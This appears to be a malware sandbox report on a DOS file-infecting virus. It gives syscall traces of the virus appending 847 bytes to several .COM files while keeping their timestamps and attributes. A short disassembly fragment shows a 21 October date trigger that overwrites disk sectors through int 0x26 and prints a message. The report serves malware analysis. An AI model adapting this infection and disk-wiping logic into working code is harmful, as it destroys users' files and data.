Sample viewer

vx.netlux.org/Virus.DOS.Suicidal.847

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:26:08.997956937Z 26 PC: 12b66 | Set disk transfer address
2018-12-17T22:26:08.999460242Z 71 PC: 12b70 | Get current directory
2018-12-17T22:26:09.002541864Z 78 PC: 12b86 | Find first file
2018-12-17T22:26:09.008819533Z 67 PC: 12bb8 | Get or set file attributes
2018-12-17T22:26:09.015259617Z 67 PC: 12bc8 | Get or set file attributes
2018-12-17T22:26:09.031641404Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:26:09.043257924Z 87 PC: 12bd7 | Get or set file date and time
2018-12-17T22:26:09.045319511Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:26:09.052186356Z 66 PC: 12c4f | Move file pointer
2018-12-17T22:26:09.053825049Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:26:09.056664392Z 66 PC: 12c62 | Move file pointer
2018-12-17T22:26:09.058614036Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-17T22:26:09.067618407Z 87 PC: 12c0f | Get or set file date and time
2018-12-17T22:26:09.069427439Z 67 PC: 12c1d | Get or set file attributes
2018-12-17T22:26:09.074865281Z 62 PC: 12c21 | Close file
2018-12-17T22:26:09.082557625Z 78 PC: 12cc1 | Find first file
2018-12-17T22:26:09.08842976Z 78 PC: 12ce9 | Find first file
2018-12-17T22:26:09.095112254Z 79 PC: 12bab | Find next file
2018-12-17T22:26:09.098165068Z 67 PC: 12bb8 | Get or set file attributes
2018-12-17T22:26:09.110716077Z 67 PC: 12bc8 | Get or set file attributes
2018-12-17T22:26:09.126391675Z 61 PC: 12bd1 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:26:09.133652763Z 87 PC: 12bd7 | Get or set file date and time
2018-12-17T22:26:09.135321927Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:26:09.142616455Z 66 PC: 12c4f | Move file pointer
2018-12-17T22:26:09.143968998Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:26:09.146520275Z 66 PC: 12c62 | Move file pointer
2018-12-17T22:26:09.148417997Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-17T22:26:09.156498572Z 87 PC: 12c0f | Get or set file date and time
2018-12-17T22:26:09.157909377Z 67 PC: 12c1d | Get or set file attributes
2018-12-17T22:26:09.16330037Z 62 PC: 12c21 | Close file
2018-12-17T22:26:09.170783082Z 78 PC: 12cc1 | Find first file
2018-12-17T22:26:09.176320043Z 78 PC: 12ce9 | Find first file
2018-12-17T22:26:09.182947225Z 79 PC: 12bab | Find next file
2018-12-17T22:26:09.185414747Z 67 PC: 12bb8 | Get or set file attributes
2018-12-17T22:26:09.195770956Z 67 PC: 12bc8 | Get or set file attributes
2018-12-17T22:26:09.205232113Z 61 PC: 12bd1 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:26:09.210020084Z 87 PC: 12bd7 | Get or set file date and time
2018-12-17T22:26:09.211602762Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:26:09.218261962Z 66 PC: 12c4f | Move file pointer
2018-12-17T22:26:09.226551505Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:26:09.229466493Z 66 PC: 12c62 | Move file pointer
2018-12-17T22:26:09.231377955Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-17T22:26:09.239478038Z 87 PC: 12c0f | Get or set file date and time
2018-12-17T22:26:09.24097663Z 67 PC: 12c1d | Get or set file attributes
2018-12-17T22:26:09.245769157Z 62 PC: 12c21 | Close file
2018-12-17T22:26:09.253924357Z 78 PC: 12cc1 | Find first file
2018-12-17T22:26:09.264612418Z 78 PC: 12ce9 | Find first file
2018-12-17T22:26:09.270967194Z 79 PC: 12bab | Find next file
2018-12-17T22:26:09.273643353Z 67 PC: 12bb8 | Get or set file attributes
2018-12-17T22:26:09.279003469Z 67 PC: 12bc8 | Get or set file attributes
2018-12-17T22:26:09.288504726Z 61 PC: 12bd1 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:26:09.29516487Z 87 PC: 12bd7 | Get or set file date and time
2018-12-17T22:26:09.296512392Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:26:09.302740486Z 66 PC: 12c4f | Move file pointer
2018-12-17T22:26:09.304894847Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:26:09.307293124Z 66 PC: 12c62 | Move file pointer
2018-12-17T22:26:09.308460294Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-17T22:26:09.316466076Z 87 PC: 12c0f | Get or set file date and time
2018-12-17T22:26:09.317872485Z 67 PC: 12c1d | Get or set file attributes
2018-12-17T22:26:09.322253041Z 62 PC: 12c21 | Close file
2018-12-17T22:26:09.331244689Z 78 PC: 12cc1 | Find first file
2018-12-17T22:26:09.33720009Z 78 PC: 12ce9 | Find first file
2018-12-17T22:26:09.343066428Z 79 PC: 12bab | Find next file
2018-12-17T22:26:09.346108824Z 67 PC: 12bb8 | Get or set file attributes
2018-12-17T22:26:09.351438917Z 67 PC: 12bc8 | Get or set file attributes
2018-12-17T22:26:09.360705334Z 61 PC: 12bd1 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:26:09.371870376Z 87 PC: 12bd7 | Get or set file date and time
2018-12-17T22:26:09.373172796Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:26:09.379284757Z 66 PC: 12c4f | Move file pointer
2018-12-17T22:26:09.38120917Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:26:09.383669091Z 66 PC: 12c62 | Move file pointer
2018-12-17T22:26:09.384930595Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-17T22:26:09.393940314Z 87 PC: 12c0f | Get or set file date and time
2018-12-17T22:26:09.395315924Z 67 PC: 12c1d | Get or set file attributes
2018-12-17T22:26:09.400027971Z 62 PC: 12c21 | Close file
2018-12-17T22:26:09.407728244Z 78 PC: 12cc1 | Find first file
2018-12-17T22:26:09.413621489Z 78 PC: 12ce9 | Find first file
2018-12-17T22:26:09.419311207Z 78 PC: 12cc1 | Find first file
2018-12-17T22:26:09.430519652Z 78 PC: 12ce9 | Find first file
2018-12-17T22:26:09.440774552Z 59 PC: 12c80 | Change current directory
2018-12-17T22:26:09.44258963Z 42 PC: 12c84 | Get date 0x12c84: cmp dh, 0xa
0x12c87: jne 0x12c91
0x12c89: cmp dl, 0x15
0x12c8c: jne 0x12c91
0x12c8e: jmp 0x12c9f
0x12c90: nop
0x12c91: ret
0x12c92: mov ah, 0x3b
0x12c94: lea dx, word ptr [bp + 0x407]
0x12c98: int 0x21
0x12c9a: jb 0x12c74
0x12c9c: jmp 0x12b76
0x12c9f: mov al, 2
0x12ca1: mov cx, 0x29a
0x12ca4: mov dx, 0
0x12ca7: mov bx, 0x2c0
0x12caa: int 0x26
0x12cac: lea dx, word ptr [bp + 0x43b]
0x12cb0: mov ah, 9
0x12cb2: int 0x21

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4633,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:35.119619131Z 26 PC: 12b66 | Set disk transfer address
2018-12-25T11:52:35.122157648Z 71 PC: 12b70 | Get current directory
2018-12-25T11:52:35.125156803Z 78 PC: 12b86 | Find first file
2018-12-25T11:52:35.131546532Z 67 PC: 12bb8 | Get or set file attributes
2018-12-25T11:52:35.138506746Z 67 PC: 12bc8 | Get or set file attributes
2018-12-25T11:52:35.15665512Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:35.168395565Z 87 PC: 12bd7 | Get or set file date and time
2018-12-25T11:52:35.170411096Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:35.176877357Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:52:35.17834949Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:35.181292079Z 66 PC: 12c62 | Move file pointer
2018-12-25T11:52:35.183348591Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-25T11:52:35.191684066Z 87 PC: 12c0f | Get or set file date and time
2018-12-25T11:52:35.193747258Z 67 PC: 12c1d | Get or set file attributes
2018-12-25T11:52:35.199637177Z 62 PC: 12c21 | Close file
2018-12-25T11:52:35.207200157Z 78 PC: 12cc1 | Find first file
2018-12-25T11:52:35.213041029Z 78 PC: 12ce9 | Find first file
2018-12-25T11:52:35.219483123Z 79 PC: 12bab | Find next file
2018-12-25T11:52:35.222546005Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.233359341Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.244711533Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.251351878Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.252666797Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.259476247Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.260718288Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.263150399Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.265257474Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.273473194Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.275307047Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.281455319Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.288992521Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.299882389Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.306199244Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.308803491Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.327303519Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.337564388Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.344335161Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.345594922Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.352635277Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.354486607Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.357830663Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.359380485Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.367768173Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.369162856Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.373651502Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.381495212Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.387142213Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.392751959Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.395870826Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.406074811Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.417912954Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.425454233Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.4266994Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.432848876Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.434713762Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.437167783Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.438616108Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.446823564Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.448190467Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.452828163Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.460481529Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.466132932Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.471674245Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.474865518Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.481713498Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.489618958Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.494055209Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.495043074Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.498906531Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.500483452Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.502251924Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.503466073Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.517551177Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.518771397Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.521847483Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.527213266Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.531238197Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.537972067Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.544781735Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.553244221Z 59 PC: 12c80 | Change current directory
2018-12-25T11:52:35.554849607Z 42 PC: 12c84 | Get date 0x12c84: cmp dh, 0xa
0x12c87: jne 0x12c91
0x12c89: cmp dl, 0x15
0x12c8c: jne 0x12c91
0x12c8e: jmp 0x12c9f
0x12c90: nop
0x12c91: ret
0x12c92: mov ah, 0x3b
0x12c94: lea dx, word ptr [bp + 0x407]
0x12c98: int 0x21
0x12c9a: jb 0x12c74
0x12c9c: jmp 0x12b76
0x12c9f: mov al, 2
0x12ca1: mov cx, 0x29a
0x12ca4: mov dx, 0
0x12ca7: mov bx, 0x2c0
0x12caa: int 0x26
0x12cac: lea dx, word ptr [bp + 0x43b]
0x12cb0: mov ah, 9
0x12cb2: int 0x21

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4633,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:35.083972301Z 26 PC: 12b66 | Set disk transfer address
2018-12-25T11:52:35.085336517Z 71 PC: 12b70 | Get current directory
2018-12-25T11:52:35.087713586Z 78 PC: 12b86 | Find first file
2018-12-25T11:52:35.091499171Z 67 PC: 12bb8 | Get or set file attributes
2018-12-25T11:52:35.095349467Z 67 PC: 12bc8 | Get or set file attributes
2018-12-25T11:52:35.113144094Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:35.120432565Z 87 PC: 12bd7 | Get or set file date and time
2018-12-25T11:52:35.12187991Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:35.129668737Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:52:35.131300342Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:35.135077401Z 66 PC: 12c62 | Move file pointer
2018-12-25T11:52:35.137424911Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-25T11:52:35.14685136Z 87 PC: 12c0f | Get or set file date and time
2018-12-25T11:52:35.148395739Z 67 PC: 12c1d | Get or set file attributes
2018-12-25T11:52:35.154484492Z 62 PC: 12c21 | Close file
2018-12-25T11:52:35.163598316Z 78 PC: 12cc1 | Find first file
2018-12-25T11:52:35.170426379Z 78 PC: 12ce9 | Find first file
2018-12-25T11:52:35.17796292Z 79 PC: 12bab | Find next file
2018-12-25T11:52:35.180825392Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.187085427Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.197890949Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.210791272Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.211970435Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.216340727Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.217906495Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.221569072Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.222792514Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.232047303Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.233649461Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.238770113Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.248059322Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.254709192Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.261137902Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.264610032Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.276805577Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.291426117Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.29993204Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.302060424Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.310242282Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.311759354Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.314700999Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.31618211Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.325121297Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.327214092Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.332424884Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.342471979Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.351252889Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.358176954Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.361395426Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.368841263Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.379759045Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.387264748Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.389633743Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.399283858Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.400803164Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.402853248Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.404474902Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.409839889Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.4110959Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.415635343Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.421228688Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.430742357Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.438007337Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.440362685Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.444750129Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.455324463Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.467296348Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.469369314Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.477097355Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.480495245Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.483783564Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.486296497Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.495210344Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.496884793Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.504150487Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.513314454Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.519790058Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.527201145Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.53953025Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.547656661Z 59 PC: 12c80 | Change current directory
2018-12-25T11:52:35.549174973Z 42 PC: 12c84 | Get date 0x12c84: cmp dh, 0xa
0x12c87: jne 0x12c91
0x12c89: cmp dl, 0x15
0x12c8c: jne 0x12c91
0x12c8e: jmp 0x12c9f
0x12c90: nop
0x12c91: ret
0x12c92: mov ah, 0x3b
0x12c94: lea dx, word ptr [bp + 0x407]
0x12c98: int 0x21
0x12c9a: jb 0x12c74
0x12c9c: jmp 0x12b76
0x12c9f: mov al, 2
0x12ca1: mov cx, 0x29a
0x12ca4: mov dx, 0
0x12ca7: mov bx, 0x2c0
0x12caa: int 0x26
0x12cac: lea dx, word ptr [bp + 0x43b]
0x12cb0: mov ah, 9
0x12cb2: int 0x21

{"DateBased":true,"Day":21,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4633,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:35.172392028Z 26 PC: 12b66 | Set disk transfer address
2018-12-25T11:52:35.174951947Z 71 PC: 12b70 | Get current directory
2018-12-25T11:52:35.178618443Z 78 PC: 12b86 | Find first file
2018-12-25T11:52:35.185309218Z 67 PC: 12bb8 | Get or set file attributes
2018-12-25T11:52:35.191579664Z 67 PC: 12bc8 | Get or set file attributes
2018-12-25T11:52:35.216481331Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:35.228537733Z 87 PC: 12bd7 | Get or set file date and time
2018-12-25T11:52:35.230682426Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:35.241244424Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:52:35.242849163Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:35.245850056Z 66 PC: 12c62 | Move file pointer
2018-12-25T11:52:35.248776322Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-25T11:52:35.25816361Z 87 PC: 12c0f | Get or set file date and time
2018-12-25T11:52:35.259691611Z 67 PC: 12c1d | Get or set file attributes
2018-12-25T11:52:35.265285635Z 62 PC: 12c21 | Close file
2018-12-25T11:52:35.274134467Z 78 PC: 12cc1 | Find first file
2018-12-25T11:52:35.28107666Z 78 PC: 12ce9 | Find first file
2018-12-25T11:52:35.288233993Z 79 PC: 12bab | Find next file
2018-12-25T11:52:35.292274419Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.304473916Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.315374803Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.323166788Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.324733155Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.331841881Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.333807229Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.336825021Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.338426627Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.348022923Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.350002624Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.355431584Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.364941036Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.372455675Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.379672214Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.383968859Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.390401189Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.401347407Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.40909134Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.411040386Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.418468038Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.420072153Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.423715194Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.425588858Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.434853074Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.438159882Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.443495352Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.452186048Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.460412841Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.467027434Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.470329594Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.477903553Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.488756818Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.501885104Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.503885801Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.510906358Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.512142605Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.514921515Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.516742625Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.525577227Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.52723681Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.532396452Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.541142762Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.547619834Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.554822644Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.557920176Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.570496032Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.581962608Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.589309072Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.590802728Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.598584038Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.599949579Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.602648317Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.608232187Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.61738043Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.619551358Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.625813726Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.635445082Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.642202073Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.648849735Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.655496132Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.661773321Z 59 PC: 12c80 | Change current directory
2018-12-25T11:52:35.663652142Z 42 PC: 12c84 | Get date 0x12c84: cmp dh, 0xa
0x12c87: jne 0x12c91
0x12c89: cmp dl, 0x15
0x12c8c: jne 0x12c91
0x12c8e: jmp 0x12c9f
0x12c90: nop
0x12c91: ret
0x12c92: mov ah, 0x3b
0x12c94: lea dx, word ptr [bp + 0x407]
0x12c98: int 0x21
0x12c9a: jb 0x12c74
0x12c9c: jmp 0x12b76
0x12c9f: mov al, 2
0x12ca1: mov cx, 0x29a
0x12ca4: mov dx, 0
0x12ca7: mov bx, 0x2c0
0x12caa: int 0x26
0x12cac: lea dx, word ptr [bp + 0x43b]
0x12cb0: mov ah, 9
0x12cb2: int 0x21
2018-12-25T11:52:35.667221787Z 9 PC: 12cb4 | Display string (String= 'Happy Birthday Freaky!')

{"DateBased":true,"Day":21,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4633,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
